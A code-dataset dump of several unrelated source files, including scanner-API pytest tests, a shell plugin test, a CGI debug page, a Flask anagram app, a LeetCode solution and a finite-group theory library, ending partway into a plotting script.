api.scanners.edit(scanner['id'], force_plugin_update=True)
@pytest.mark.vcr()
def test_scanner_get_aws_targets_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.get_aws_targets('nope')
@pytest.mark.vcr()
def test_scanner_get_aws_targets_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.get_aws_targets(1)
@pytest.mark.vcr()
@pytest.mark.xfail(raises=NotFoundError)
def test_scanner_get_aws_targets_permissionerror(stdapi):
with pytest.raises(PermissionError):
stdapi.scanners.get_aws_targets(1)
@pytest.mark.skip(reason="No AWS Environment to test against.")
@pytest.mark.vcr()
def test_scanner_get_aws_targets(api, scanner):
pass
@pytest.mark.vcr()
def test_scanner_key_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.get_scanner_key('nope')
@pytest.mark.vcr()
def test_scanner_key(api, scanner):
assert isinstance(api.scanners.get_scanner_key(scanner['id']), str)
@pytest.mark.vcr()
def test_get_scans_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.get_scans('nope')
@pytest.mark.vcr()
def test_get_scans_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.get_scans(1)
@pytest.mark.vcr()
def test_get_scans_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.get_scans(scanner['id'])
@pytest.mark.vcr()
def test_get_scans(api, scanner):
assert isinstance(api.scanners.get_scans(scanner['id']), list)
@pytest.mark.vcr()
def test_list_scanners_permissionerror(stdapi):
with pytest.raises(PermissionError):
stdapi.scanners.list()
@pytest.mark.vcr()
def test_list_scanners(api):
assert isinstance(api.scanners.list(), list)
@pytest.mark.vcr()
def test_link_state_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.toggle_link_state('nope', True)
@pytest.mark.vcr()
def test_link_state_linked_typeerror(api):
with pytest.raises(TypeError):
api.scanners.toggle_link_state(1, 'nope')
@pytest.mark.vcr()
def test_link_state_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.toggle_link_state(scanner['id'], True)
@pytest.mark.vcr()
def test_link_state(api, scanner):
api.scanners.toggle_link_state(scanner['id'], True)
@pytest.mark.vcr()
def test_scanners_get_permissions(api, scanner):
perms = api.scanners.get_permissions(scanner['id'])
assert isinstance(perms, list)
for p in perms:
check(p, 'type', str)
check(p, 'permissions', int)
@pytest.mark.vcr()
def test_scanner_edit_permissions(api, scanner, user):
api.scanners.edit_permissions(scanner['id'],
{'type': 'default', 'permissions': 16},
{'type': 'user', 'id': user['id'], 'permissions': 16}) | [
"steve@chigeek.com"
] | steve@chigeek.com |
df3910edec0018e22e73d750172933db0402f750 | 6a22b7e73dc2ff6c089b727d0a3858241846f8df | /Systems/esh-spring-2015.git/src/plugins/systemInfo_test.py | 79044de0ccade054d72a819f02d293037742a7cd | [
"MIT"
] | permissive | mikefeneley/school | fe48ee989ac83d4836ce93538cbe51496f709abe | 5156f4537ca76782e7ad6df3c5ffe7b9fb5038da | refs/heads/master | 2021-06-10T01:52:21.148937 | 2016-12-23T12:39:32 | 2016-12-23T12:39:32 | 72,551,482 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import sys, imp, atexit, os
sys.path.append("/home/courses/cs3214/software/pexpect-dpty/");
import pexpect, shellio, signal, time, os, re, proc_check
# Determine the path this file is in
thisdir = os.path.dirname(os.path.realpath(__file__))
#Ensure the shell process is terminated
def force_shell_termination(shell_process):
c.close(force=True)
# pulling in the regular expression and other definitions
# this should be the eshoutput.py file of the hosting shell, see usage above
definitions_scriptname = sys.argv[1]
def_module = imp.load_source('', definitions_scriptname)
# you can define logfile=open("log.txt", "w") in your eshoutput.py if you want logging!
logfile = None
if hasattr(def_module, 'logfile'):
logfile = def_module.logfile
#spawn an instance of the shell, note the -p flags
c = pexpect.spawn(def_module.shell, drainpty=True, logfile=logfile, args=['-p', thisdir])
atexit.register(force_shell_termination, shell_process=c)
# set timeout for all following 'expect*' calls to 5 seconds
c.timeout = 5
#############################################################################
#
# Actual Test
assert c.expect(def_module.prompt) == 0, "Shell did not print expected prompt (1)"
c.sendline("systemInfo")
assert c.expect('------------------------------------------------\r\n') == 0, "Shell did not print out expected values";
assert c.expect(def_module.prompt) == 0, "Shell did not print expected prompt (2)"
shellio.success()
| [
"michael.j.feneley@gmail.com"
] | michael.j.feneley@gmail.com |
365f848ad8dde1db19f683afd8439f0362e34fb7 | e3a674666de18e3b722bfd36e54d6a32e3f0b726 | /html/default.py | 6971548d1f71ed3f49da66c818ddae27850fbfbf | [] | no_license | sauloaldocker/lamp | 92d52c3105cd1d00d816138a64de66643fda67c3 | 9088f899e9a4e7e04941518041e10630cfdf71f1 | refs/heads/master | 2021-01-20T04:36:21.783064 | 2017-04-02T13:22:02 | 2017-04-02T13:22:02 | 21,629,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-# enable debugging
import cgitb
import os
import sys
cgitb.enable()
print "Content-Type: text/html;charset=utf-8"
print
print "<h1>argv</h1>"
print "<table>"
for k in sys.argv:
print "<tr><td>%s</td></tr>" % (k)
print "</table>"
print "<h1>environ</h1>"
print "<table>"
for k in os.environ:
print "<tr><td><b>%s</b></td><td>%s</td></tr>" % (k, os.environ[k])
print "</table>"
print "<h1>path</h1>"
print "<table>"
for k in sys.path:
print "<tr><td>%s</td></tr>" % (k)
print "</table>"
| [
"sauloal@gmail.com"
] | sauloal@gmail.com |
a3bb3ecefb0daf9c42cee95e85b7561e754a16d4 | 19126b16eb2678164c1bc282e5b9c86216b483aa | /process.py | f9f46504f1d9b85e4d31638e02b6fde00cc7fe34 | [] | no_license | lucjon/unescape | 366e5ef6914533bf4a6b85391fb7681ce1500203 | cf618144a0efc5fb3f94ed6e5c472322ef223ab2 | refs/heads/master | 2020-03-30T06:42:46.411895 | 2010-12-07T21:16:05 | 2010-12-07T21:16:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | print 'var _entities = {'
f = open('entities')
for entity in f:
s = entity.split('\t')
print '\t"%s": "%s",' % (s[0], s[1])
f.close()
print '};'
| [
"lucas@lucasjones.co.uk"
] | lucas@lucasjones.co.uk |
ab6a077030d7e71350326b60b2622c761eac3670 | ca539b0df7ca5a91f80b2e2f64e7379e69243298 | /87.py | 219641b62a1f8827bc7e6a09e66208ccf7bb59c1 | [] | no_license | yorick76ee/leetcode | 9a9e5d696f3e32d9854c2ed9804bd0f98b03c228 | d9880892fe15f9bb2916beed3abb654869945468 | refs/heads/master | 2020-03-18T22:59:29.687669 | 2016-07-18T19:56:55 | 2016-07-18T19:56:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | class Solution(object):
def lettercount(self,s1,s2):
dict1,dict2={},{}
for i in range(len(s1)):
if s1[i] not in dict1:
dict1[s1[i]] = 1
else:
dict1[s1[i]] += 1
if s2[i] not in dict2:
dict2[s2[i]] = 1
else:
dict2[s2[i]] += 1
for i in range(len(s1)):
char = s1[i]
try:
if dict1[char] != dict2[char]:
return False
except:
return False
return True
def recursive(self,s1,s2):
length = len(s1)
if length == 1 or s1 == s2:
return s1 == s2
if not self.lettercount(s1,s2):
return False
for i in range(1,length):
s1_one = s1[:i]
s2_one = s2[:i]
s1_two = s1[i:]
s2_two = s2[i:]
one_flag,two_flag = False,False
if (s1_one,s2_one) in self.dp:
one_flag = self.dp[(s1_one,s2_one)]
else:
one_flag = self.recursive(s1_one,s2_one)
if (s1_two,s2_two) in self.dp:
two_flag = self.dp[(s1_two,s2_two)]
else:
two_flag = self.recursive(s1_two,s2_two)
if one_flag and two_flag:
self.dp[(s1,s2)] = True
return True
for i in range(1,length):
s1_one = s1[:i]
s2_one = s2[length-i:]
s1_two = s1[i:]
s2_two = s2[:length-i]
one_flag,two_flag = False,False
if (s1_one,s2_one) in self.dp:
one_flag = self.dp[(s1_one,s2_one)]
else:
one_flag = self.recursive(s1_one,s2_one)
if (s1_two,s2_two) in self.dp:
two_flag = self.dp[(s1_two,s2_two)]
else:
two_flag = self.recursive(s1_two,s2_two)
if one_flag and two_flag:
self.dp[(s1,s2)] = True
return True
self.dp[(s1,s2)] = False
return False
def isScramble(self, s1, s2):
"""
:type s1: str
:type s2: str
:rtype: bool
"""
self.dp = {}
return self.recursive(s1,s2)
if __name__ == '__main__':
wds= Solution()
print wds.isScramble('oatzzffqpnwcxhejzjsnpmkmzngneo','acegneonzmkmpnsjzjhxwnpqffzzto')
| [
"641614152@qq.com"
] | 641614152@qq.com |
c07d3081696dfc63bf3149aacfa29ae61b1791ba | cc69873bda24115753417a962773798662585c5e | /AnagramSolver/AnagramSolver/views.py | 3b4baf3c7805c920deb1198154a27eda7878990b | [] | no_license | nguyenvinh2/AnagramSolver | e6930096a81b3c0280ab85c0b78232d13c0967be | f6deba01622fe6b298eab3a32a1e1e9633e4c6d7 | refs/heads/master | 2020-04-14T06:45:49.357938 | 2019-01-03T19:44:28 | 2019-01-03T19:44:28 | 163,695,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,803 | py | """
Routes and views for the flask application.
"""
from datetime import datetime
from flask import render_template
from AnagramSolver import app
from flask import Flask, request
import json
import requests
class Word():
def __init__(self, word, definition):
self.word = word
self.definition = definition
#gets all possible permutations
def find_anagram(word):
if len(word) <= 1:
return word
else:
word_array = []
for anagram in find_anagram(word[1:]):
for i in range(len(word)):
word_array.append(anagram[:i] + word[0:1] + anagram[i:])
return word_array
@app.route('/')
@app.route('/home')
def home():
"""Renders the home page."""
return render_template('index.html',
title='Home Page',
year=datetime.now().year,)
@app.route('/anagram', methods=['POST'])
def anagram():
word = request.form['getWord']
print(word)
stringURL = 'http://www.anagramica.com/best/' + word
getJSON = requests.get(stringURL)
anagram = json.loads(getJSON.text)
wordList = []
for eachword in anagram['best']:
wordList.append(Word(eachword, dictionary(eachword)))
return render_template('index.html',
title = 'Home Page',
word = word,
year = datetime.now().year,
anagrams = wordList)
def dictionary(word):
app_id = 'Your Oxford API ID'
app_key = 'You Oxford API KEY'
language = 'en'
url = 'https://od-api.oxforddictionaries.com:443/api/v1/entries/' + language + '/' + word.lower()
print(word)
response = requests.get(url, headers = {'app_id': app_id, 'app_key': app_key})
print(response.text)
print("Code {}\n".format(response.status_code))
getJSON = json.loads(response.text)
definition = getJSON['results'][0]['lexicalEntries'][0]['entries'][0]['senses'][0]['definitions'][0]
return definition
| [
"nguyenv2@outlook.com"
] | nguyenv2@outlook.com |
f61a8aa843d980025a0559ae59a7f1b2df92821a | c122279ed10ecf9a5b7b91789591179a30f2e543 | /src/group.py | 95d0f7b9f5a852501c7aa37d47d1e19e3fafcb5f | [
"MIT"
] | permissive | MrCamoga/Finite-Groups-2 | 15fa54fa9008d29ca1362d952b5744f279e19577 | 5e52102a423a8ff4eed0cbf59617b6fe999e7ef3 | refs/heads/master | 2021-02-16T22:37:00.047213 | 2020-11-11T14:15:25 | 2020-11-11T14:15:25 | 245,049,648 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,292 | py | from functools import reduce
from sympy import isprime, gcd, lcm, factorint
from operator import itemgetter
from random import randint
import typing
"""
TODO:
isNormal ✓
Inn(G) ✓
conjugacy class ✓
Z(G) ✓
centralizer ✓
left/right cosets ✓
quotient group ✓
powers of an element ✓
symmetric group ✓
alternating group ✓
normalizer ✓
commutator [g,h] = g-1h-1gh ✓
false witnesses group ✓
conjugacy classes ✓
Out(G) = Aut(G)/Inn(G) ✓
fast inverse ✓
GL, PGL, PSL ✓
automorphism from generators ✓
generalized symmetric group ✓
generalized quaternion group ✓
dicyclic group ✓
central product ✓
homomorphisms class ✓
subset/subgroup class ✓
isCyclic ✓
Aut(G) ✓
GL ✓
PGL ✓
Out(G) ✓
commutator subgroup
wreath product
change the semidirect product f from array of automorphisms to an actual function
derived series
isSolvable
hyperoctahedral group
lower central series
quotient of group whose elements are lists cannot return cosets because lists are not hashable
metacyclic group
determinant function
SO,O
define group from generators and relations, for example G = < a,b,c,d | a3=b3=c3=d3=1, ab=ba, cac-1=ab-1, ad=da, bc=cb, bd=db, dcd-1=ab-1c >
fast order for predefined groups
Write permutations as disjoint cycles (enumerate partitions of n etc), this could be useful for conjugacy classes
Change Symmetric.__lehmerinv and Alternating.__index from O(n^2) to O(n)
compute orders in O(n)
isIsomorphic (check cardinals, cyclic, abelian, element orders conjugacy classes,...)
isSimple
Aut(G) (as subgroup of Sn)
Aut, Inn, Out of direct, semidirect, central products, quotient group,...
Sylow subgroups, normal subgroups, subgroups
lattice of subgroups ----> get maximal subgroups
get set of generators
reduce set of generators on Group.subgroup()
composition series
quotient group: is abelian / is cyclic / simple
character table
optimize Units()
simple groups
sporadic groups
Groups that don't work yet:
Subgroup
SL, PSL
Aut2
Holomorph: needs Aut2
Duplicated methods/classes:
centralizer2 >?? centralizer
Units2 > Units
"""
class Group:
def __init__(self, n: int, e: callable, op: callable):
self.element = e
self.op = op
self.card = n
self.abelian = None
self.cyclic = None
self.simple = None
self.id = None
def __len__(self):
return self.card
def multiply(self, H: iter, K: iter) -> set:
"""
HK = {h*k : h∈H, k∈K}
"""
HK = set()
for h in H:
for k in K:
HK.add(self.op(h, k))
return HK
def order(self, g: int) -> int:
p = g
order = 1
while True:
p = self.op(p, g)
if p == g:
return order
order += 1
def exponent(self) -> int:
"""
lcm of all orders
"""
return lcm(list(self.orders(True).keys()))
def subgroup(self, gens: typing.Union[list,set]) -> set:
"""
Returns subgroup generated by gens
"""
H = {self.identity()}
size = 0
while len(H) != size:
size = len(H)
for g in gens:
for h in list(H):
H.add(self.op(h,g))
return H
def powers(self, g: int) -> list:
"""
<g> = {g^k : k∈N}
"""
p = [g]
while True:
t = self.op(p[-1], g)
if t == g:
return p
p.append(t)
def identity(self) -> int:
"""
Returns identity element
"""
if self.id is None:
self.id = self.powers(0)[-1]
return self.id
def automorphism(self, genimg: dict) -> list:
"""
Get automorphism defined by the images of the generators
genimg = {g:f(g) for g in gens}
"""
bijection = [self.identity()]*self.card
H = {self.identity()}
for g, f in genimg.items():
bijection[g] = f
while len(H) != self.card:
for g in genimg.keys():
for h in list(H):
p = self.op(h, g)
if p not in H:
bijection[p] = self.op(bijection[h], bijection[g])
H.add(p)
return bijection
def Syl(self, p: int) -> typing.List[set]:
"""
Returns all sylow p-subgroups
"""
if not isprime(p):
return None
m = self.card
k = 0
while m % p == 0:
m //= p
k += 1
order = {o for o in range(1, m+1, p) if m % o == 0}
# if k == 0:
# return None
##
## def centralizerSet(self,S):
## """
## {g∈G : gs=sg ∀s∈S}
## """
def centralizer(self, s: int) -> set:
"""
{g∈G : gs=sg}
"""
if self.isAbelian():
return {g for g in self}
C = {self.identity(), s}
H = {g for g in self}
while len(H) > 0:
g = H.pop()
if self.op(g, s) == self.op(s, g):
powers = self.powers(g)
C.add(g)
for p in powers:
if p not in H:
continue
H.remove(p)
C.add(p)
return C
def centralizer2(self, s: int) -> set:
return {g for g in self if self.op(g, s) == self.op(s, g)}
def normalizer(self, H: typing.Union[set,list]) -> set:
if self.isAbelian():
return {g for g in self}
return {g for g in self if self.leftcoset(H, g) == self.rightcoset(H, g)}
def normalizer2(self, H: typing.Union[set,list]) -> set:
if self.isAbelian():
return {g for g in self}
N = set(H)
for g in self:
if g in N:
continue
if self.leftcoset(H, g) == self.rightcoset(H, g):
powers = [g]
p = self.op(g, g)
while p not in N:
powers.append(p)
p = self.op(p, g)
for n in list(N):
for m in powers:
N.add(self.op(n, m))
return N
def orders(self, Dict: bool = False) -> typing.Union[dict,list]:
o = {self.identity(): 1}
elements = {g for g in self}
while len(elements) > 0:
g = elements.pop()
powers = self.powers(g)
orderg = len(powers)
o[g] = orderg
for i in range(len(powers)):
if powers[i] in o:
continue
o[powers[i]] = orderg//gcd(i+1, orderg)
elements.remove(powers[i])
if Dict:
h = dict()
for k, v in o.items():
h.setdefault(v, set()).add(k)
return h
return [o[i] for i in self]
def center(self) -> set:
"""
Z(G) = {g∈G : gs=sg ∀s∈G}
"""
if self.abelian:
return {k for k in self}
Z = {self.identity()}
for g in self:
if g in Z:
continue
b = False
for s in self:
if s in Z:
continue
if self.op(s, g) != self.op(g, s):
b = True
break
if b:
continue
powers = [g]
while True:
t = self.op(g, powers[-1])
if t == self.identity() or t in Z:
break
powers.append(t)
for s in list(Z):
for x in powers:
Z.add(self.op(x, s))
return Z
def derivedSubgroup(self):
"""
Commutator subgroup
[G,G] = {g-1h-1gh : g,h∈G}
"""
return self.commutatorSub(self,self)
def commutatorSub(self,H,K):
"""
Commutator subgroup of subgroups H and K
[H,K] = {h-1k-1hk : h∈H,k∈K}
"""
from groups import Subgroup
S = {self.identity()}
for h in H:
for k in K:
S.add(self.commutator(h,k))
return Subgroup(self,H=S)
def derivedSeries(self):
"""
G_{0} = G
G_{i+1} = [G_{i},G_{i}] = G_{i}'
"""
S = [self]
from groups import Subgroup
if self.isAbelian():
if self.card > 1:
return S + [Subgroup(self,H=[self.identity()])]
else:
return S
while True:
C = S[-1].derivedSubgroup()
if len(C) == len(S[-1]):
return S
S.append(C)
def upperCentralSeries(self):
"""
Z^{0}(G) = {e}
Z^{i+1}(G) = π^{-1}(Z(G/Z^{i}(G))) where π is the natural projection G -> G/Z^{i}(G)
"""
if self.card == 1:
return [{self.identity()}]
S = [{self.identity()},self.center()]
Q = self/S[-1]
while True:
Z = Q.center()
N = set().union(*(Q.eindex(k) for k in Z))
if len(N) == len(S[-1]):
return S
S += [N]
Q = self/N
def lowerCentralSeries(self): # FIX
"""
G_{0} = G
G_{i+1} = [G_{i},G]
"""
S = [set(self)]
if self.isAbelian():
if self.card > 1:
return S + [Subgroup(self,H=[self.identity()])]
else:
return S
while True:
C = self.commutatorSub(S[-1],self)
if len(C) == len(S[-1]):
return S
S.append(C)
def isSolvable(self) -> bool:
if self.card < 60:
return True
if all(p == 1 for p in factorint(self.card).values()): # Square free order => solvable
return True
return len(self.derivedSeries()[-1]) == 1
def isPerfect(self) -> bool:
"""
[G,G] == G
"""
return len(self.derivedSeries()) == 1
def perfectCore(self):
"""
Largest perfect subgroup. Limit of the derived series
"""
return self.derivedSeries()[-1]
def nilpotencyClass(self) -> int:
"""
Nilpotency class of the group
Returns -1 if not nilpotent
"""
s = self.upperCentralSeries()
if len(s[-1])==self.card:
return len(s)-1
return -1
def isNilpotent(self) -> bool:
"""
Upper central series end in the whole subgroup
"""
if self.isPGroup():
return True
return len(self.upperCentralSeries()[-1]) == self.card
def isPGroup(self) -> bool:
return len(factorint(self.card)) == 1
def pow(self, g: int, i: int) -> int:
"""
g^i
"""
p = self.identity()
while i > 0:
if i & 1:
p = self.op(p, g)
g = self.op(g, g)
i >>= 1
return p
def inverse(self, g: int) -> int:
"""
g^-1
"""
p = g
while True:
tmp = self.op(p, g)
if tmp == self.identity():
return p
p = tmp
def leftconjugate(self, g: int, x: int) -> int:
"""
gxg-1
"""
return reduce(self.op, [g, x, self.inverse(g)])
def rightconjugate(self, g: int, x: int) -> int:
"""
g-1xg
"""
return reduce(self.op, [self.inverse(g), x, g])
def commutator(self, g: int, h: int) -> int:
"""
g-1h-1gh
"""
return reduce(self.op, [self.inverse(self.op(h, g)), g, h])
def leftcoset(self, H: iter, g: int) -> set:
"""
gH = {gh : h∈H}
"""
return {self.op(g, h) for h in H}
def rightcoset(self, H: iter, g: int) -> set:
"""
Hg = {hg : h∈H}
"""
return {self.op(h, g) for h in H}
def conjugacyClass(self, x: int) -> set:
"""
Cl(x) = {g-1xg : g∈G}
"""
return {self.leftconjugate(g, x) for g in self}
def conjugacyClasses(self) -> typing.List[set]:
Cl = []
for i in self:
b = False
for C in Cl:
if i in C:
b = True
continue
if not b:
Cl.append(self.conjugacyClass(i))
return Cl
def isSubgroup(self, H: typing.Union[list,set]) -> bool:
if self.card % len(H) != 0:
return False
for h in H:
for k in H:
if self.op(h, k) not in H:
return False
return True
def isNormal(self, H: typing.Union[list,set]) -> bool:
"""
Test if H is normal in G
H = list/set with indices of elements of G
"""
if not self.isSubgroup(H):
return False
if self.card == 2*len(H) or self.isAbelian():
return True
H = set(H)
S = {self.identity()}
for h in H:
if h in S:
continue
for g in self:
if not self.leftconjugate(g, h) in H:
return False
powers = [h]
while True:
t = self.op(h, powers[-1])
if t == self.identity() or t in S:
break
powers.append(t)
for s in list(S):
for x in powers:
S.add(self.op(x, s))
return True
def isAbelian(self) -> bool:
"""
Returns true if G is abelian
"""
if self.abelian != None:
return self.abelian
elif self.cyclic:
self.abelian = True
return True
else:
S = {self.identity()}
for g in self:
if g in S:
continue
for s in S:
if self.op(s, g) != self.op(g, s):
self.abelian = False
return False
powers = [g]
while True:
t = self.op(g, powers[-1])
if t == self.identity() or t in S:
break
powers.append(t)
for s in list(S):
for x in powers:
S.add(self.op(x, s))
self.abelian = True
return self.abelian
def isCyclic(self) -> bool:
if self.cyclic == None:
if isprime(self.card):
self.cyclic = True
self.abelian = True
self.simple = True
return True
if not self.isAbelian():
self.cyclic = False
return False
self.cyclic = self.card in self.orders(True)
return self.cyclic
return self.cyclic
def isSimple(self) -> bool:
if self.simple != None:
return self.simple
decomp = factorint(self.card)
if len(decomp) == 1 and list(decomp.values())[0] == 1: #isprime
self.simple = True
return True
elif self.card%2==1 or len(decomp) <= 2: # Feit-Thompson and Burnside's Theorems
self.simple = False
return False
if self.isSolvable():
return False
# TODO analize sylow subgroups
return None
def isIsomorphic(self, other) -> bool:
if repr(self) == repr(other):
return True
if self.card != other.card or (self.isAbelian() != other.isAbelian()) or (self.isCyclic() != other.isCyclic()):
return False
o1 = self.orders(True)
o2 = other.orders(True)
lo1 = {k:len(v) for k,v in o1}
lo2 = {k:len(v) for k,v in o2}
if lo1 != lo2:
return False
elif self.isAbelian() and other.isAbelian():
return True
## c1 = self.conjugacyClasses()
## c2 = other.conjugacyClasses()
##
## lc1 = {k:len(v) for k,v in c1}
## lc2 = {k:len(v) for k,v in c2}
# TODO
def __iter__(self):
return GroupIter(self)
def __truediv__(self, N: set):
from groups import Quotient
return Quotient(self, N)
def __mul__(self, H):
from groups import Direct
return Direct(self, H)
def __pow__(self, n: int):
from groups import Direct
return Direct([self]*n)
def __getitem__(self, i: int):
return self.element(i)
def __eq__(self, H):
return self.isIsomorphic(H)
class GroupIter():
def __init__(self, G):
self.G = G
self.index = 0
def __next__(self):
if self.index < self.G.card:
g = self.index
self.index += 1
return g
raise StopIteration()
def cayleyTable(G, truerepr: bool =False) -> None:
"""
truerepr True prints element name
False prints element index
"""
if truerepr:
T = ([G[G.op(j, i)] for i in G]for j in G)
else:
T = ([G.op(j, i) for i in G]for j in G)
for i in T:
print(",".join(str(j) for j in i))
def functioninverse(f:list) -> list:
g = [None]*len(f)
for i in range(len(f)):
g[f[i]] = i
return g
def composition(f: list, g: list) -> list:
"""
Returns g◦f
"""
return list(itemgetter(*f)(g))
def testassocrand(H: Group, n: int) -> bool:
for _ in range(n):
a,b,c = (randint(0,H.card-1) for _ in range(3))
if H.op(H.op(a,b),c) != H.op(a,H.op(b,c)):
print("Non associative",a,b,c)
print(H.op(H.op(a,b),c), H.op(a,H.op(b,c)))
return False
return True
def count_partitions(n: int) -> int:
if n < 0:
return 0
if n < 2:
return 1
dp = [0] * (n + 1)
dp[0] = 1
for i in range(1, n):
for j in range(1, n + 1):
if i <= j:
dp[j] += dp[j - i]
return dp[-1]+1
def count_abelian_groups(n: int) -> int:
if n < 1:
return 0
if n < 4:
return 1
f = factorint(n)
count = {}
for i in f.values():
count[i] = count.get(i, 0) + 1
return reduce(lambda a,b: a*b, (count_partitions(k)**v for k,v in count.items()))
def count_groups(order: int) -> int:
"""
Counting groups: gnus, moas and other exotica https://www.math.auckland.ac.nz/~obrien/research/gnu.pdf
OEIS A000001: Number of groups of order n. https://oeis.org/A000001
Enumeration of groups whose order factorises in at most 4 primes: https://arxiv.org/pdf/1702.02616.pdf
"""
if order <= 0:
return 0
if order < 4:
return 1
f = factorint(order)
l = list(f.items())
l.sort(key=itemgetter(0))
def w(r,s):
return 1 if r%s==0 else 0
if len(l) == 1: # p-group
p,power = l[0]
if power <= 2:
return power
if power == 3:
return 5
if power == 4:
return 14 if p == 2 else 15
if power == 5:
if p == 2:
return 51
if p == 3:
return 67
return 61 + 2*p + 2*gcd(p-1,3) + gcd(p-1,4)
if power == 6:
if p == 2:
return 267
if p == 3:
return 504
return 344 + 39*p + 3*p**2 + 24*gcd(p-1,3) + 11*gcd(p-1,4) + 2*gcd(p-1,5)
if power == 7:
if p == 2:
return 2328
if p == 3:
return 9310
if p == 5:
return 34297
return 2455 + 707*p + 170*p**2 + 44*p**3 + 12*p**4 + 3*p**5 + (291+44*p+4*p**2)*gcd(p-1,3) + (135+19*p+p**2)*gcd(p-1,4) + (31+3*p)*gcd(p-1,5) + 4*gcd(p-1,7) + 5*gcd(p-1,8) + gcd(p-1,9)
if power < 11 and p == 2:
return [56092,10494213,49487365422][power-8]
return -1
if len(l) == 2:
a,b = l[0][1],l[1][1] # exponents
if a==b==1: # pq
return 1 if gcd(l[0][0],l[1][0]-1) == 1 else 2
if {a,b} == {1,2}: #p^2q
p,q = l[0][0],l[1][0]
if b == 2:
p,q=q,p
if q == 2:
return 5
return 2 + (q+5)/2*w(p-1,q) + w(p+1,q) + 2*w(q-1,p) + w(q-1,p**2)
if {a,b} == {1,3}: #p^3q
p,q = l[0][0],l[1][0]
if b == 3:
p,q=q,p
if p==2 and q==3:
return 15
if p==2 and q==7:
return 13
if q==2:
return 15
if p==2:
return 12 + 2*w(q-1,4) + w(q-1,8)
if q==3:
return 5 + 14*w(p-1,3) + 2*w(p+1,3)
return 5 + (q**2+13*q+36)/6*w(p-1,q) + (p+5)*w(q-1,p) + 2/3*w(q-1,3)*w(p-1,q) + w((p+1)*(p**2+p+1),q) + w(p+1,q) + 2*w(q-1,p**2) + w(q-1,p**3)
if a==b==2: # p^2q^2, p < q
p,q = l[0][0],l[1][0]
if p==2:
return 14 if q==3 else 12+4*w(q-1,4)
return 4 + (p**2+p+4)/2*w(q-1,p**2) + (p+6)*w(q-1,p) + 2*w(q+1,p) + w(q+1,p**2)
return -1
if len(l) == 3:
p,q,r = (l[i][0] for i in range(3))
if all(l[i][1] == 1 for i in range(3)): # square free order
t = ((q-1)%p == 0)*4 + ((r-1)%p == 0)*2 + ((r-1)%q == 0)
return [1,2,2,4,2,3,p+2,p+4][t]
if sorted(f.values()) == [1,1,2]: # p**2*q*r, q < r
if f[q] == 2:
p,q=q,p
elif f[r] == 2:
p,q,r = r,p,q
if p==2 and q==3 and r==5:
return 13
if q==2:
return 10 + (2*r+7)*w(p-1,r) + 3*w(p+1,r) + 6*w(r-1,p) + 2*w(r-1,p**2)
return 2 + p*(p-1)*w(q-1,p**2)*w(r-1,p**2) + \
(p-1)*(w(q-1,p**2)*w(r-1,p) + w(r-1,p**2)*w(q-1,p) + 2*w(r-1,p)**w(q-1,p)) + \
(q-1)*(q+4)/2*w(p-1,q)*w(r-1,q) + \
(q-1)/2*(w(p+1,q)*w(r-1,q) + w(p-1,q) + w(p-1,q*r) + 2*w(r-1,p*q)*w(p-1,q)) + \
(q*r+1)/2*w(p-1,q*r) + \
(r+5)/2*w(p-1,r)*(1 + w(p-1,q)) + \
w(p**2-1,q*r) + 2*w(r-1,p*q) + w(r-1,p)*w(p-1,q) + w(r-1,p**2*q) + \
w(r-1,p)*w(q-1,p) + 2*w(q-1,p) + 3*w(p-1,q) + 2*w(r-1,p) + \
2*w(r-1,q) + w(r-1,p**2) + w(q-1,p**2) + w(p+1,r) + w(p+1,q)
return -1
if all(p == 1 for p in f.values()): # aquare free order, Hölder's formula
from itertools import product
primes = set(f.keys())
def c(p,primes):
count = 0
for q in primes:
count += w(q-1,p)
return count
count = 0
for comb in product(*[[0,1]]*len(primes)): # combinations of all primes to compute divisors
leftprimes = {p for i,p in enumerate(primes) if comb[i]}
m = reduce(lambda a,b:a*b,leftprimes,1)
prod = 1
for p in primes-leftprimes:
prod *= ((p**c(p,leftprimes)-1)/(p-1))
count += prod
return count
return -1
def count_non_abelian_groups(n):
count = count_groups(n)
if count == -1:
return -1
else:
return count-count_abelian_groups(n)
class Subset():
def __init__(self, G, H):
e = list(H)
self.element = lambda k: e[k]
self.card = len(H)
# This returns an element of G that cannot be converted back to an element of H since we don't know of H is closed under the operation of G
self.op = lambda g, h: G.op(self.element(g), self.element(h))
self.subgroup = None
if __name__ == "__main__":
from groups import *
from testraster import saveImage
## G = Cyclic(2)**3
## A = Aut2(G)
## A.generators = {128,129,130}
## AA = Aut2(A)
| [
"mrcamoga@gmail.com"
] | mrcamoga@gmail.com |
682e551baae2d8218700c8db937894c61af7b8fa | 3a0747429d28a4027aa84c051d73aa42b8adf69d | /sakuzu32/hov_wh04_sa.py | 5cfb7e66416a0c61a166eedc7783190f6812092e | [] | no_license | shukubota/b4 | ee06f1b49b2e99d96b1b0e4434d1976e9507bbda | 765ab46c763ced72c70c97ea8c4f38370688af4b | refs/heads/master | 2021-01-11T05:55:15.513100 | 2018-11-08T08:12:06 | 2018-11-08T08:12:06 | 94,946,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,941 | py | #coding:utf-8
import sys
sys.path.append('/home/kubotashu/kubota/labo/sakuzu/sakuzu/sakuzu09/')
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from function import *
import os.path
import matplotlib.cm as cm
#####################
#fileのサイズ
#########################
lon1=-90.
lon2=-70.
lat1=0.
lat2=15.
grid=0.1
local=-6
##################
grid2=0.75
##############################
#かきたいえのsize
#########################
#test rectangle
#lon3=96.
#lon4=101.
#lat3=-5.
#new guinia
#lon3=135.
#lon4=145.
#lat3=-10.
#br west
#lon3=116.
